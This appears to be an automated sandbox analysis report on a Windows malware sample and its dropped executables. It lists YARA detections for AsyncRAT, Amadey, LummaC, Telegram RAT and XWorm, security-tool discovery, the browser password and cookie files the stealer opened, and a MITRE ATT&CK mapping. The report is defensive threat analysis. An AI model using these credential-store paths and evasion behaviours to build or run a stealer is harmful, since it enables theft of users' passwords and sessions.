Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018906001\003.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018906001\003.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E8CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

1_2_00E8CBEA

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: RzAAR0y.exe, 0000000B.00000002.4666221685.000001AC38F79000.00000004.00000020.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4744725206.000000001BF35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: procexp.exe
Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2589474879.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2182621065.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RzAAR0y.exe PID: 6860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RzAAR0y.exe PID: 6860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0049EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		9_2_0049EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0049DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		9_2_0049DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	212 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	21 Scheduled Task/Job	21 Scheduled Task/Job	14 Obfuscated Files or Information	Security Account Manager	246 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	971 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	371 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	371 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	100%	Avira	HEUR/AGEN.1313061
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	100%	Avira	HEUR/AGEN.1320706
